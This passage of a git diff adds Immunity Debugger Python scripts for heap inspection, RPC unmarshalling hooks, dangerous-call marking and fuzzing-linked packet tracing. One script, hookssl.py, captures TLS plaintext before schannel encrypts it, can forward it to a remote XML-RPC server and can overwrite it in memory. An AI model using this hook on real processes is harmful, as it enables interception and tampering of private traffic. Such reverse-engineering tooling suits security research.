+ ret = "Alloc Hook <%s>" % HookOn(imm, heap, ALLOCLABEL, RtlAllocateHeapHook, allocaddr, Disable)
+ if FreeFlag:
+ freeaddr = imm.getAddress("ntdll.RtlFreeHeap" )
+ if ret:
+ ret+= " - "
+ ret +="Free Hook <%s>" % HookOn(imm, heap, FREELABEL, RtlFreeHeapHook, freeaddr, Disable)
+ return ret
+ else:
+ return "Please, select a correct Heap"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/1.73/PyCommands/hookndr.py b/1.73/PyCommands/hookndr.py
new file mode 100755
index 0000000..35882a2
--- /dev/null
+++ b/1.73/PyCommands/hookndr.py
@@ -0,0 +1,112 @@
+import socket
+import struct
+import xmlrpclib
+import traceback
+import base64
+from immlib import *
+from immutils import *
+import getopt
+
+DESC="""Hooks the NDR unmarshalling routines and prints them out so you can see which ones worked"""
+
+
+#############################################################################
+class set_hooks(LogBpHook):
+ def __init__(self):
+ LogBpHook.__init__(self)
+ self.description=""
+
+ return
+
+ #########################################################################
+ def run(self,regs):
+ '''
+
+ '''
+ imm = Debugger()
+ imm.log("%s"%self.description)
+ return
+
+def usage(imm):
+ imm.Log("!hookndr.py")
+ imm.Log("-D (to uninstall hook)")
+ imm.Log("-h This help")
+ return
+
+# The main routine that gets run when you type !packets
+def main(args):
+
+ imm = Debugger()
+ imm.ignoreSingleStep("CONTINUE")
+ try:
+ opts,argo = getopt.getopt(args, "Dh")
+ except:
+ return usage(imm)
+ xmlhost=""
+ xmlport=0
+ for o,a in opts:
+ if o == "-D":
+ ndrhooks=imm.getKnowledge("ndrhooks")
+ if not ndrhooks:
+ imm.log("Could not find hooks to delete!")
+ return "Did not find hook to delete"
+ for hooker in ndrhooks:
+ imm.removeHook(hooker)
+ #now forget about that hook
+ imm.forgetKnowledge("ndrhooks")
+ return "Unhooked our ndr hooks"
+ if o =="-h":
+ return usage(imm)
+
+ #otherwise it's time to hook some functions! Horray!
+ #these functions are all in RPCRT4.dll
+ #you know what would be good, being able to get all these automatically by listing names
+ #and then looking for Ndr*Unmarshall!
+ names= ["NdrPointerUnmarshall","NdrNonConformantStringUnmarshall","NdrNonEncapsulatedUnionUnmarshall"]
+ names+=["NdrRangeUnmarshall","NdrSimpleStructUnmarshall","NdrSimpleTypeUnmarshall","NdrUserMarshalUnmarshall"]
+ names+=["NdrVaryingArrayUnmarshall","NdrXmitOrRepAsUnmarshall","NdrByteCountPointerUnmarshall","NdrClientContextUnmarshall"]
+ names+=["NdrComplexArrayUnmarshall","NdrConformantArrayUnmarshall","NdrConformantStringUnmarshall","NdrConformantStructUnmarshall"]
+ names+=["NdrConformantVaryingArrayUnmarshall","NdrConformantVaryingStructUnmarshall","NdrEncapsulatedUnionUnmarshall"]
+ names+=["NdrFixedArrayUnmarshall","NdrInterfacePointerUnmarshall"]
+ hooks=[]
+ for functionname in names:
+ # Find the addresses of the functions we want to hook
+ # Then register the hooks
+ addy = imm.getAddress("RPCRT4."+functionname)
+ imm.log(functionname+ " found at 0x%x"%addy)
+ if addy == -1:
+ imm.log("Could not locate %s"%functionname)
+ continue
+
+ # Set the hooks - this is the start hook
+ hooker = set_hooks()
+ hooker.description="Entering: %s"%functionname
+ ret=hooker.add(hooker.description, addy)
+ if ret==-1:
+ imm.log("Hooking add failed!")
+ else:
+ hooks+=[hooker.description]
+
+ func = imm.getFunction( addy )
+ imm.Error("1")
+ endaddies=imm.getFunctionEnd( func) #get the address of all the rets of the function
+ imm.Error("2")
+ for addy in endaddies:
+ # Set the hooks
+ hooker = set_hooks()
+ imm.Error("3")
+ #hooker.description="Leaving: %s"%functionname
+ imm.Error("4")
+ ret=hooker.add(hooker.description, addy)
+ imm.Error("5")
+ if ret==-1:
+ imm.log("Hooking add failed!")
+ else:
+ hooks+=[hooker.description]
+
+ imm.log("Added %d hooks"%(len(hooks)))
+ imm.Error("ea")
+ imm.addKnowledge("ndrhooks",hooks)
+ return "Network hooks in place."
+
+
diff --git a/1.73/PyCommands/hookssl.py b/1.73/PyCommands/hookssl.py
new file mode 100755
index 0000000..987ff93
--- /dev/null
+++ b/1.73/PyCommands/hookssl.py
@@ -0,0 +1,184 @@
+import socket
+import struct
+import xmlrpclib
+import traceback
+import base64
+from immlib import *
+from immutils import *
+import getopt
+
+DESC="""Creates a table that displays packets received on the network."""
+
+
+#############################################################################
+class set_hooks(LogBpHook):
+ def __init__(self):
+ LogBpHook.__init__(self)
+ self.xmlhost = ""
+ self.xmlport = 0
+ return
+ #########################################################################
+ def run(self,regs):
+ '''
+ This routine is the first one hit, when a socket operation occurs.
+ '''
+ imm = Debugger()
+
+
+ # Retrieve the function name
+ function_name = imm.getKnowledge("%08x" % regs['EIP'])
+ imm.log("Hook hit for %s"%function_name)
+ self.retrieve_packet(imm,function_name,regs)
+ return
+
+ #########################################################################
+ def retrieve_packet(self,imm,function_name,regs):
+ '''
+ This function logs the packet data into cap_win
+ '''
+ imm.log("Retrieving packet from %s"%function_name)
+ # Determine what function we have hooked, based on this, retrieve the packet contents
+ if function_name == "SSL3DecryptMessage":
+ #nothing yet
+ return
+ elif function_name == "SSL3EncryptMessage":
+ imm.log("Looking at SSL3EncryptMessage data")
+ #The payload ptr is at esp+24
+ pbuffer_ptr = imm.readMemory( regs['ESP'] + 0x24, 4)
+ pbuffer_ptr = int(struct.unpack("L", pbuffer_ptr)[0])
+
+ #the size of the buffer is at esp+0x20
+ pbuffer_len = imm.readMemory( regs['ESP'] + 0x20, 4)
+ pbuffer_len = int(struct.unpack("L", pbuffer_len)[0])
+
+ imm.log("pbuffer_Size=%d"%pbuffer_len)
+ #imm.Log("Buffer Location: 0x%08x" % pbuffer_ptr[0])
+ imm.log("pbuffer_ptr=%s"%repr(pbuffer_ptr))
+ # Get the pointer to the packet payload
+ payload = imm.readMemory(pbuffer_ptr, pbuffer_len)
+ imm.log("Payload=%s"%repr(payload))
+ #payload= "Payload!"
+ decoded_payload = ""
+ # Build the list thats table-friendly
+ log_items = [function_name,repr(payload),decoded_payload]
+
+ # Get a handle to the window and add the items, along with the related
+ # address, this is sweet cause you can double-click on a packet and
+ # see in the disassembly where it was sent/received :)
+
+
+ #save this data to a file called payloads.txt
+ #file("payloads.txt","ab").write(repr(payload)+"\n")
+ using_xml_rpc = False
+
+ if self.xmlport != 0:
+ server = xmlrpclib.ServerProxy("http://%s:%d/"%(self.xmlhost,self.xmlport), allow_none=True)
+ imm.Log("Using server: %s:%d"%(self.xmlhost, self.xmlport))
+ using_xml_rpc = True
+ else:
+ server = None
+
+ if using_xml_rpc:
+ #send our xml request to the remove side
+ #if self.filter matches...(stub for now)
+ try:
+ result = server.senddata(("ssldata",[base64.encodestring(payload)]))
+ except:
+ data=traceback.format_exc()
+ imm.Log("Failed to connect to remote server, sorry")
+ imm.LogLines("Error was: %s"%data)
+ return
+
+ #Now parse what we got back - a command and list of arguments
+ command, arguments = result
+ if command=="LEAVEALONE":
+ imm.Log("Leaving alone")
+ return
+ elif command=="REPLACE":
+ payload=arguments[0]
+ payload=base64.decodestring(payload) #decode it
+ imm.log("New Payload recved: %s"%repr(payload))
+
+ #they encrypt messages in place, so we need to use their original
+ #buffer to put our message into.
+ #The payload ptr is at esp+24
+ pbuffer_ptr = imm.readLong( regs['ESP'] + 0x24)
+ imm.Log("Replacing buffer at %8.8x with data of length %d"%(pbuffer_ptr, len(payload)))
+ imm.writeMemory(pbuffer_ptr, payload)
+
+
+ #add more commands from XML-RPC here
+
+
+
+ return
+
+def usage(imm):
+ imm.Log("!hookssl.py")
+ imm.Log("-D (to uninstall hook)")
+ imm.Log("-s host:port (Server to send XML-RPC data to)")
+ imm.Log("-h This help")
+ return
+
+# The main routine that gets run when you type !packets
+def main(args):
+
+ imm = Debugger()
+ imm.ignoreSingleStep("CONTINUE")
+ try:
+ opts,argo = getopt.getopt(args, "Dhs:")
+ except:
+ return usage(imm)
+ xmlhost=""
+ xmlport=0
+ for o,a in opts:
+ if o == "-D":
+ hooker=imm.getKnowledge("ssl3hook")
+ if not hooker:
+ imm.log("Could not find hook to delete!")
+ return "Did not find hook to delete"
+ imm.removeHook("SSL 3 Encrypt Message")
+ imm.removeHook("SSL 3 Decrypt Message")
+ #now forget about that hook
+ imm.forgetKnowledge("ssl3hook")
+ return "Unhooked our ssl3hook"
+ if o == "-s":
+ xmlhost,xmlport = a.split(":")
+ xmlport=int(xmlport)
+ if o =="-h":
+ return usage(imm)
+
+ hooker = set_hooks()
+ hooker.xmlhost=xmlhost
+ hooker.xmlport=xmlport
+
+
+ # Find the addresses of the functions we want to hook
+ # Then register the hooks
+ ssl3encryptmessage = imm.getAddress("schannel._Ssl3EncryptMessage@12")
+ imm.log("SSL3 Encrypt Message found at 0x%x"%ssl3encryptmessage)
+ if ssl3encryptmessage == -1:
+ imm.log("Could not locate ssl3encryptmessage")
+ return "Failed to find address to hook!"
+
+ ssl3decryptmessage = imm.getAddress("schannel._Ssl3DecryptMessage@12")
+ imm.log("SSL3 Decrypt Message found at 0x%x"%ssl3encryptmessage)
+ if ssl3decryptmessage == -1:
+ imm.log("Could not locate ssl3encryptmessage")
+ return "Failed to find address to hook!"
+
+
+ # Set the hooks
+ ret=hooker.add("SSL 3 Encrypt Message", ssl3encryptmessage)
+ ret=hooker.add("SSL 3 Decrypt Message", ssl3decryptmessage)
+ imm.addKnowledge("ssl3hook",hooker)
+ imm.log("Hooker.add returned %s"%ret)
+ if ret==-1:
+ imm.log("Hooker add failed! :<")
+ return "Failed to add hook!"
+ # Register the hook-address pair with the knowledgebase
+ imm.addKnowledge("%08x" % ssl3encryptmessage, "SSL3EncryptMessage")
+ imm.addKnowledge("%08x" % ssl3decryptmessage, "SSL3DecryptMessage")
+ return "Network hooks in place."
+
+
diff --git a/1.73/PyCommands/list.py b/1.73/PyCommands/list.py
new file mode 100755
index 0000000..609dd7a
--- /dev/null
+++ b/1.73/PyCommands/list.py
@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+List all pycommands with its descriptions in log window
+
+"""
+
+DESC="""List PyCommands"""
+
+import immlib
+import glob
+
+
+def main(args):
+ imm=immlib.Debugger()
+ which=glob.glob("./PyCommands/*.py")
+ imm.Log("List of available PyCommands")
+ for file in which:
+ command=file.split("\\")[1].split(".")[0]
+ imm.Log("* %s" % command)
+ imm.Log("",focus=1)
+ return "Command executed"
+
+
+
+
\ No newline at end of file
diff --git a/1.73/PyCommands/lookaside.py b/1.73/PyCommands/lookaside.py
new file mode 100755
index 0000000..8f40757
--- /dev/null
+++ b/1.73/PyCommands/lookaside.py
@@ -0,0 +1,74 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+__VERSION__ = '1.0'
+
+DESC = """Shows the Lookaside of the Heap structure"""
+
+import immlib
+from libheap import *
+import getopt
+import libdatatype
+
+def usage(imm):
+ imm.Log("!lookaside Shows the Lookaside of the Heap structure")
+ imm.Log("-h Heap Address", focus=1)
+ imm.Log("-d Discovery DataType")
+
+
+def main(args):
+ imm = immlib.Debugger()
+ heap = 0x0
+ discover = None
+
+ if not args:
+ usage(imm)
+ return "Wrong args (Check the Log Window)"
+
+ try:
+ opts, argo = getopt.getopt(args, "h:d")
+ except getopt.GetoptError:
+ usage(imm)
+ return "Bad heap argument %s" % args[0]
+
+ for o,a in opts:
+ if o == "-h":
+ try:
+ heap = int(a, 16)
+ except ValueError, msg:
+ self.InfoLine("Invalid heap address: %s" % a)
+ return 0
+ elif o == '-d':
+ discover = libdatatype.DataTypes(imm)
+
+ if heap:
+ pheap = PHeap( imm, heap )
+ lookaddr = pheap.Lookaside
+ imm.Log("Dumping Lookaside: 0x%08x (0x%08x) " % (lookaddr, heap) )
+ if lookaddr:
+ plook = PHeapLookaside( imm, lookaddr )
+
+ for ndx in range(0, len(plook) ):
+ l = plook[ndx]
+ if not l.isEmpty():
+ imm.Log("Lookaside[%02x]: " % ndx, address = l.addr)
+ for a in l.getList():
+ imm.Log(" " * 15 +"> 0x%08x (%d)" % (a, ndx * 8), address = a, focus=1)
+ if discover:
+ list = discover.Get( a+4, ndx*8 - 4)
+ for obj in list:
+ imm.Log(" " * 15 + "[%s] %s" % (obj.name, obj.Print()), address = obj.address )
+
+
+
+
+ return "Lookaside at 0x%08x dumped" % pheap.Lookaside
+ else:
+ usage(imm)
+ return "No Heap Provided"
diff --git a/1.73/PyCommands/mark.py b/1.73/PyCommands/mark.py
new file mode 100755
index 0000000..af97fd9
--- /dev/null
+++ b/1.73/PyCommands/mark.py
@@ -0,0 +1,130 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+import immlib
+import getopt
+
+
+__VERSION__ = '1.1'
+
+DESC= "Static Analysis: Mark the tiny ones"
+
+def usage(imm):
+ """ All the options"""
+ imm.Log("!mark search and mark given function")
+ imm.Log("!mark [-f NAME ] [-c COMMENT] [-m MODULE]")
+ imm.Log("Example: mark with DANGER_MOUSE string all the strcpy ones")
+ imm.Log("!mark -f strcpy -c DANGER_MOUSE -m ALL")
+
+
+def main(args):
+ imm = immlib.Debugger()
+
+ if not args:
+ imm.Log("### Immunity's Mark the tiny ones script###",focus=1)
+ imm.Log("Command ok, but no args, using defaults")
+ try:
+ opts, argo = getopt.getopt(args, "f:c:m:")
+ except getopt.GetoptError: #get args, if error, show usage
+ usage(imm)
+ return "Bad argument %s" % args[0]
+
+
+ #tiny ones default list
+ tinyones=[]
+ tinyones.append("strcpy")
+ tinyones.append("memcpy")
+ tinyones.append("memmov")
+
+
+ module=None
+ function=None
+ function_address=0
+ comment="default comment"
+
+
+ #parsing args
+ for o,a in opts:
+ if o == "-f":
+ try:
+ function = a
+ function_address=imm.getAddress(function)
+ imm.Log("%s address: 0x%8x" % (function,function_address),focus=1)
+ except ValueError, msg:
+ imm.Log("No function given, using the tiny ones")
+ if o == "-c":
+ comment = a
+ imm.Log("Comment: %s" %comment)
+ if o == "-m":
+ if a and a != "ALL":
+ try:
+ module = imm.getModule(a)
+ if not module:
+ return "Invalid module: %s" % a
+ else:
+ imm.Log("module: %s" %module.getName())
+ base = module.getBase()
+ except ValueError, msg:
+ return "Invalid module: %s" % a
+ else:
+ regs=imm.getRegs()
+ module = imm.findModule(regs['EIP']) # if no module given, use the one we are standing on
+ if not module:
+ return "Module?"
+ else:
+ imm.Log("module: %s" %module[0])
+ base=module[1]
+
+ #all data, find and mark
+ if module == "ALL":
+ mods = imm.getAllModules()
+ for mod in mods:
+ refaddr=imm.getInterCalls(mod.getBase())
+ for a in refaddr.keys():
+ op = imm.Disasm(a)
+ #imm.Log("op: %s"% op.comment)
+ decoded=imm.decodeAddress(refaddr[a][0][2]) # decode destination
+ if function_address != 0:
+ if function in decoded: #and ask if function name is in destination
+ imm.Log("From: 0x%08x - to 0x%08x" %(a,refaddr[a][0][0]))
+ imm.Log("Decoded destination: %s" % decoded)
+ imm.setComment(a,comment) #so, set your comment
+ else:
+ for function in tinyones:
+ if function in decoded: #and ask if function name is in destination
+ imm.Log("From: 0x%08x - to 0x%08x" %(a,refaddr[a][0][0]))
+ imm.Log("Decoded destination: %s" % decoded)
+ imm.setComment(a,comment) #so, set your comment
+
+
+
+ else:
+ regs=imm.getRegs()
+ refaddr=imm.getInterCalls(regs['EIP'])
+ for a in refaddr.keys():
+ op = imm.Disasm(a)
+ #imm.Log("op: %s"% op.comment)
+ decoded=imm.decodeAddress(refaddr[a][0][2]) # decode destination
+ if function_address != 0:
+ if function in decoded: #and ask if function name is in destination
+ imm.Log("From: 0x%08x - to 0x%08x" %(a,refaddr[a][0][0]))
+ imm.Log("Decoded destination: %s" % decoded)
+ imm.setComment(a,comment) #so, set your comment
+ else:
+ for function in tinyones:
+ if function in decoded: #and ask if function name is in destination
+ imm.Log("From: 0x%08x - to 0x%08x" %(a,refaddr[a][0][0]))
+ imm.Log("Decoded destination: %s" % decoded)
+ imm.setComment(a,comment) #so, set your comment
+
+
+ return "mark finished executing"
+
+
+
\ No newline at end of file
diff --git a/1.73/PyCommands/mike.py b/1.73/PyCommands/mike.py
new file mode 100755
index 0000000..166f467
--- /dev/null
+++ b/1.73/PyCommands/mike.py
@@ -0,0 +1,830 @@
+import getopt
+import struct
+import time
+import sys
+import threading
+
+from immutils import *
+from immlib import *
+from libstackanalyze import *
+from graphclass import *
+from immvcglib import *
+from socket import *
+
+DESC="""Attempts to automate tracing the lifecycle of a packet's contents."""
+
+#############################################################################
+'''
+Some defines for re-use.
+'''
+PACKET_TYPE_SEND = "Send "
+PACKET_TYPE_RECV = "Recv "
+PACKET_PROTOCOL_UDP = "(UDP)"
+PACKET_PROTOCOL_TCP = "(TCP)"
+
+#############################################################################
+class packet_analyzer(BpHook):
+
+ #########################################################################
+ def __init__(self, address, hook_type):
+
+ BpHook.__init__(self)
+ self.begin_address = address
+ self.imm = Debugger()
+ self.graph = Graph()
+ self.draw = Draw()
+ self.buf = []
+ self.nodes_buf = []
+ self.nodes = []
+ self.edges_buf = []
+ self.func_start = None
+ self.func_end = None
+ self.graph_handler = None
+ self.last_bb = None
+ self.hook_type = hook_type
+ self.first_func_finished = False
+ self.bb_end = True
+ self.node_count = 0
+ self.node_covered = {}
+ self.active_node = ""
+
+ #########################################################################
+ def run(self, regs):
+ '''
+ This is the main hook routine that occurs at [ESP] of a socket
+ function call. It kicks off the whole process of sniffing the
+ packet, graphing, and analyzing it.
+ '''
+
+ session = self.imm.getKnowledge("session")
+ if session == True:
+ self.imm.forgetKnowledge("session")
+ self.imm.addKnowledge("session", False, force_add=0x1)
+ else:
+ self.imm.Run()
+ return
+
+
+ # Now we determine what type of packet sniff we need to do
+ if self.hook_type == "simple":
+ if self.simple_packet_sniff(regs) == False:
+ return
+ else:
+ if self.extended_packet_sniff(regs) == False:
+ return
+
+ # Make sure that the module has been analyzed.
+ if self.imm.isAnalysed(self.begin_address) != 1:
+ self.imm.analyseCode(self.begin_address)
+
+ # Workaround for EIP == functionBegin address
+ if self.begin_address == regs['EIP']:
+ self.func_start = self.regs['EIP']
+ else:
+ self.func_start = self.imm.getFunctionBegin(self.begin_address)
+
+ # Once we have the function information set some variables
+ func = self.imm.getFunction(self.func_start)
+ self.func_end = func.getEnd()
+ func_name = func.getName()
+
+ # Setup the VCG header, add the first basic block and return
+ self.start_graph(func_name)
+
+ # Now we enter into a step-over routine where we will begin
+ # tracing the execution/data flow of our packet, initialize the
+ # code coverage counter beforehand
+ self.imm.addKnowledge("code_coverage",0,force_add = 0x1)
+ self.deep_analysis_loop(regs)
+
+ # This stitches all the buffers together and splashes the graph
+ self.render_graph()
+
+ # We need to clear out the knowledgebase so let's grab the information
+ # we want to keep first
+ boo_address = self.imm.getKnowledge("boo_address")
+ boo_port = self.imm.getKnowledge("boo_port")
+ test_port = self.imm.getKnowledge("test_port")
+ test_protocol = self.imm.getKnowledge("test_protocol")
+
+ # Disable the breakpoint or this hooer will get hit again
+ #self.imm.disableBreakpoint(self.begin_address)
+
+ boo = boo_comm(boo_address,boo_port,test_port,test_protocol)
+ boo.prepare_next_case()
+
+
+
+ self.imm.Run()
+ # Give it some time to finish up any of its previous loops
+ #packet.send_test_packet()
+
+
+
+ #########################################################################
+ def deep_analysis_loop(self, regs):
+ '''
+ This is the loop that steps the instruction pointer, determines
+ branching decisions, and does the data analysis.
+ '''
+
+ loop_status = True
+
+ # We do the first instruction first, then enter a loop of stepping
+ # to analyze the rest of the code paths
+ self.imm.gotoDisasmWindow(regs['EIP'])
+ loop_status, processed_reg, step_type = self.opcode_processor(regs)
+
+ # Begin the analysis loop, go grab a coffee this can take awhile
+ while loop_status == True:
+
+ # Determine whether we want to step over or in
+ if step_type == "in":
+ self.imm.stepIn()
+ else:
+ self.imm.stepOver()
+
+ stepped_regs = self.imm.getRegs()
+
+ if self.imm.isAnalysed(stepped_regs['EIP']) != 1:
+ self.imm.analyseCode(stepped_regs['EIP'])
+
+ # Test if we landed inside a system DLL
+ if self.test_system_dll(stepped_regs['EIP']) == True and self.first_func_finished == True or self.imm.isRunning() == True:
+ break
+
+ # The opcode processor does all of the dirty work
+ loop_status, processed_reg, step_type = self.opcode_processor(stepped_regs)
+
+ return
+
+
+
+ #########################################################################
+ def opcode_processor(self, regs):
+
+ step_type = "over"
+ loop_status = True
+
+
+ # Grab the opcode from the address (EIP)
+ opcode = self.imm.disasm(regs['EIP'])
+
+ # Register the code coverage hit
+ code_coverage = self.imm.getKnowledge("code_coverage")
+ self.imm.forgetKnowledge("code_coverage")
+ code_coverage += 1
+ self.imm.addKnowledge("code_coverage",code_coverage,force_add=0x1)
+
+ # For call instructions, if its calling into a non-system module
+ # then we want to follow it. Otherwise the graph would explode.
+ if opcode.isCall() == 1:
+ if self.test_system_dll(opcode.jmpaddr) == False:
+ step_type = "in"
+
+
+ # The threshold is a way to prematurely terminate the analysis, otherwise
+ # you can go wandering off in threading routines, garbage collection stuff, etc.
+ # Break the loop if the threshold has been hit.
+ threshold = self.imm.getKnowledge("threshold")
+
+ if code_coverage >= threshold:
+ loop_status = False
+
+
+ if self.first_func_finished == True:
+
+ # Now let's send the information off to our graphing function
+ if self.bb_end == True:
+ self.add_node_header(regs['EIP'])
+ self.bb_end = False
+
+ if opcode.isJmp() == 1 or opcode.isRet() == 1 or opcode.isConditionalJmp() == 1 or loop_status == False or step_type == "in":
+ self.bb_end = True
+
+
+
+ info_panel = self.imm.getInfoPanel()
+ comment = self.imm.getComment(regs['EIP'])
+
+ # Add the instructions, information and comments to the graph.
+ self.add_node_instructions(regs['EIP'],opcode,comment,info_panel)
+
+ # We want to step into RET instructions so that we correctly get
+ # back to the callee
+ if opcode.isRet() == 1:
+ #self.imm.Log("Ret Destination: 0x%08x" % opcode.jmpaddr)
+
+ if self.first_func_finished == False:
+ self.first_func_finished = True
+
+ if self.test_system_dll(opcode.jmpaddr) == True:
+ loop_status = False
+
+ return loop_status, regs['EIP'], step_type
+
+
+ #########################################################################
+ def test_system_dll(self, address):
+ '''
+ This function is designed to take an address and return whether
+ it lies within a system DLL.
+ '''
+
+ jmp_module = self.imm.getModulebyAddress(address)
+
+ if jmp_module is not None:
+ system_dll = jmp_module.getIssystemdll()
+
+ # We test here, as well the msvcr71.dll is really a system dll
+ # but a lot of developers redistribute, treat it as such
+ if system_dll == 1 or jmp_module.name.lower() == "msvcr71.dll":
+ return True
+ else:
+ return False
+
+ return None
+
+ #########################################################################
+ def start_graph(self, func_name):
+ '''
+ This just sets up the graphing header, and initializes the graphing routine.
+ '''
+
+ # Now we do a bunch of VCG lovin to get the graph setup the way we want it
+ # this part of the code was taken directly from immvcglib.py and should not
+ # be included as part of the judging criteria
+ iteration = self.imm.getKnowledge("current_iteration")
+ if iteration != 0 and iteration is not None:
+ self.node_covered = self.imm.getKnowledge("node_covered")
+ else:
+ iteration = 0
+
+ self.buf.append('graph: {\x0d\x0a')
+ self.buf.append('title: "Packet Life (%s - Iteration: %d)"\r\n' % (self.imm.getDebuggedName(),iteration))
+ self.buf.append("manhattan_edges: yes\r\n")
+ self.buf.append("layoutalgorithm: mindepth\r\n")
+ self.buf.append("finetuning: no\r\n")
+ self.buf.append("layout_downfactor: 100\r\n")
+ self.buf.append("layout_upfactor: 0\r\n")
+ self.buf.append("layout_nearfactor: 0\r\n")
+ self.buf.append("xlspace: 12\r\n")
+ self.buf.append("yspace: 30\r\n")
+ self.buf.append("display_edge_labels: yes\r\n")
+ self.buf.append("colorentry 99: 193 255 193\r\n")
+ self.buf.append("colorentry 100: 238 233 233\r\n")
+ self.buf.append("colorentry 98: 255 69 0\r\n")
+ self.buf.append("colorentry 97: 0 139 0\r\n")
+
+ #########################################################################
+ def add_node_header(self,address):
+ '''
+ Adds the first node to the graph, this will be the function that called
+ the receive socket operation.
+ '''
+ decode_address = self.imm.decodeAddress(address)
+
+ # Start a new node by creating the header.
+ if self.node_covered.has_key(address):
+ self.active_node += 'node: { title: "%s" color: \f100 vertical_order: %d label:"\r\n\x0c31%s\x0c31\r\n\r\n' % (decode_address,self.node_count,decode_address)
+ else:
+ self.active_node += 'node: { title: "%s" color: \f99 vertical_order: %d label:"\r\n\x0c31%s\x0c31\r\n\r\n' % (decode_address,self.node_count,decode_address)
+ self.node_covered[address] = True
+
+ self.nodes.append(decode_address)
+ self.node_count += 1
+
+ #########################################################################
+ def add_node_instructions(self, address,opcode,comment=None,infopanel=None):
+ '''
+ Adds the current instruction, associated comments and information.
+ '''
+
+ self.active_node += "\f310x%08x: \f12%s\r\n" % (address, opcode.result)
+
+ if comment is not None and comment != "":
+ if opcode.isCall() == 1:
+ self.active_node += " \t\t\t\f98%s\r\n" % (comment.replace("\"", ""))
+ else:
+ self.active_node += " \t\t\t\f01%s\r\n" % (comment.replace("\"", ""))
+
+ if infopanel is not None and infopanel != "":
+ # Here we do matching against the packet contents and
+ # what is registered in the infopanel
+ self.data_match(opcode,infopanel)
+
+ self.active_node += "\r\n"
+ if self.bb_end == True:
+ self.active_node += "\r\n\"}\r\n"
+ self.last_bb = address
+ self.nodes_buf.append(self.active_node)
+ self.active_node = ""
+
+
+ #########################################################################
+ def data_match(self,opcode,infopanel):
+
+ self.imm.Log("In Data Match ++++++++++++++")
+
+ matched = False
+ sub_info = []
+
+ # Clean up the output a little
+ for info in infopanel:
+ if info != "":
+ sub_info.append(info)
+
+ for data in sub_info:
+
+ if data.find("=") != -1:
+
+ clean_data = data.split("=")[1]
+
+ op_left = opcode.result.split(" ")[0]
+ self.imm.Log("Front Opcode: %s" % cmp)
+
+ # Check for the packet length
+ packet_length = "%08x" % self.imm.getKnowledge("packet_length")
+
+ self.imm.Log("Comparing %s <-> %s" % (packet_length,clean_data))
+ if clean_data.lower() == packet_length.lower():
+ self.active_node += " \t\t\t\f08%s \f02(Packet Length)\r\n" % data.replace("\"","\\\"")
+ self.imm.Log("Possible Packet Length Match++++++++++++++++++++++++++++")
+ matched = True
+
+ if matched == False:
+ ascii_packet = self.imm.getKnowledge("ascii_packet")
+ binary_packet = self.imm.getKnowledge("binary_packet")
+
+ # Now let's begin matching the payload junk (I suck at this, many improvements can be made)
+ # Check for ASCII references
+ clean_data = data.split("ASCII")
+ self.imm.Log("Cleaned Split: %s" % clean_data)
+ if clean_data != "" and clean_data[0] != data:
+ match = clean_data[1].replace("\"","").replace(")","").strip()
+ self.imm.Log("MATCH: %s -------------------------------------------------" % match)
+ self.imm.Log("PACKE: %s -------------------------------------------------" % ascii_packet)
+ if ascii_packet.rfind(match) != -1:
+ self.active_node += " \t\t\t\f08%s \f09(Packet Payload)\r\n" % data.replace("\"","\\\"")
+ self.imm.Log("Wooot========================================")
+ matched = True
+
+ # Now let's see if there is any binary matches such as ESI=41424344
+ # again, not perfect but it should work well
+ if matched == False:
+ clean_data = data.split("=")
+ if clean_data != "" and clean_data[0] != data:
+
+ for bin in clean_data:
+ match = bin.replace("\"","").replace("(","").replace("[","").replace("]","").strip()
+ self.imm.Log("MATCH: %s -------------------------------------------------" % match)
+ self.imm.Log("PACKE: %s -------------------------------------------------" % binary_packet)
+
+ if binary_packet.rfind(match) != -1 or binary_packet[::-1].rfind(match) != -1:
+ self.active_node += " \t\t\t\f08%s \f97(Packet Payload)\r\n" % data.replace("\"","\\\"")
+ self.imm.Log("Wooot========================================")
+ matched = True
+
+ # We didn't find any matches at all, output default info
+ if matched == False:
+ self.active_node += " \t\t\t\f08%s\r\n" % data.replace("\"","\\\"")
+
+ else:
+ self.active_node += " \t\t\t\f08%s\r\n" % data.replace("\"","\\\"")
+
+
+
+
+
+
+
+ #########################################################################
+ def render_graph(self):
+ '''
+ This function assembles the nodes_buf and the edges_buf for the overall
+ graph, and pushes it to the screen.
+ '''
+
+ for a in range(0,len(self.nodes_buf)):
+ self.buf.append(self.nodes_buf[a])
+
+ self.buf.append("\r\n")
+ for a in range(0,len(self.nodes)):
+ if a < len(self.nodes)-1:
+ self.buf.append('edge: { sourcename: "%s" targetname: "%s" color: darkgreen }\r\n' % (self.nodes[a],self.nodes[a+1]))
+
+ self.buf.append("\n}\r\n")
+
+ # Send the graph back to Boo for storage
+ boo_port = self.imm.getKnowledge("boo_port")
+ boo_address = self.imm.getKnowledge("boo_address")
+ test_port = self.imm.getKnowledge("test_port")
+ test_protocol = self.imm.getKnowledge("test_protocol")
+ iteration = self.imm.getKnowledge("current_iteration")
+ version = self.imm.getModule(self.imm.getDebuggedName()).getVersion()
+
+ s = socket(AF_INET,SOCK_STREAM)
+
+ s.connect((boo_address,int(boo_port)))
+
+
+ message = "graph|%s|%s|%d|%s|%d|%s||\r\n" % (self.imm.getDebuggedName(),version,int(test_port),test_protocol,int(iteration),"".join(self.buf))
+ self.imm.Log("%s" % message)
+ s.send(message)
+
+
+
+
+ self.imm.addKnowledge("node_covered", self.node_covered,force_add=0x1)
+
+ #########################################################################
+ def simple_packet_sniff(self, regs):
+ '''
+ The simple packet sniff is one where we merely have a pointer
+ to the buffer and a length. It's very easy to read the packets
+ out of memory.
+ '''
+
+ (payload_ptr, type, function_name) = self.imm.getKnowledge("%08x" % regs['EIP'])
+
+ # The length is stored as a function return argument, so let's read EAX
+ length = regs['EAX']
+
+ try:
+ # Because return codes can be -1 (error) we have to test for that.
+ if length > 1 and length != 0xffffffff:
+
+ counter = 0
+ payload = ""
+ bin_payload = ""
+
+ # Get the raw packet payload and the length of the bytes
+ raw_payload = self.imm.readMemory(payload_ptr, length)
+ pack_len = str(length)+"c"
+
+ if raw_payload is not None:
+
+ final_payload = struct.unpack(pack_len, raw_payload)
+
+ # Iterate through the unpacked string, only outputting printable
+ # ascii characters, output the standard dots if non-printable
